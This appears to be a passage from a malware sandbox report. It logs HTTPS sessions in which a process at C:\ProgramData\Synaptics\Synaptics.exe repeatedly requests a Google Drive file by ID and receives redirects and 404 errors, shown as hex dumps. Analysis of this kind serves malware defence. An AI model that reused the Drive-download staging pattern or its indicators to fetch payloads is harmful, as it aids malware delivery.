                                                                                                                                                                    2024-12-30 03:59:29 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 49 4f 30 37 47 46 73 47 72 51 65 56 54 35 77 49 31 67 6b 74 48 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="IO07GFsGrQeVT5wI1gktHA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                    2024-12-30 03:59:29 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    74192.168.2.449858142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:29 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:30 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:29 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-eCG07fxGia1pc9tFJV8DHw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    75192.168.2.449861142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:29 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:30 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:30 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-toqfGT81Ht16fckrYy6YxA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    76192.168.2.449863142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:29 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:30 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC6EPYnsdxaBmwEzi3oy1xasAkPzCYoNSGeyMsE1cGSNvC1X7G2LjMv8A-wfiQsKaUpEsVzlc10
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:30 GMT
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Vgj3aQ7owv7-FjrEcxeqhQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:30 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                    2024-12-30 03:59:30 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6c 31 6f 70 6e 4d 30 71 5a 4b 6f 6f 4c 5f 76 75 63 6a 35 72 6d 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="l1opnM0qZKooL_vucj5rmw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                    2024-12-30 03:59:30 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    77192.168.2.449862142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:29 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:30 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC4Cu1NUzd1xt5FYFxcONGcm_PxAcuGzuznSwVVcy8m3_pue8yP4m8t1Nm8JX3NBtxs1
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:30 GMT
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-lp1vjZwqRCu2CrdcRbpMNw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:30 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                    2024-12-30 03:59:30 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 47 4a 44 4c 4b 6f 38 64 48 4e 4d 62 51 78 5a 55 61 30 4d 44 4a 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="GJDLKo8dHNMbQxZUa0MDJA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                    2024-12-30 03:59:30 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    78192.168.2.449864142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:30 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:31 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:30 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-wTgqwlrzD9JIKxMjplswMA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    79192.168.2.449868142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:31 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:31 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:31 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-PmJB4nBlnGIqasG5NcVAZw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    80192.168.2.449869142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:31 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:32 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:31 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-ixhOonxcsywuFsO1ly1Q4g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    81192.168.2.449870142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:31 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
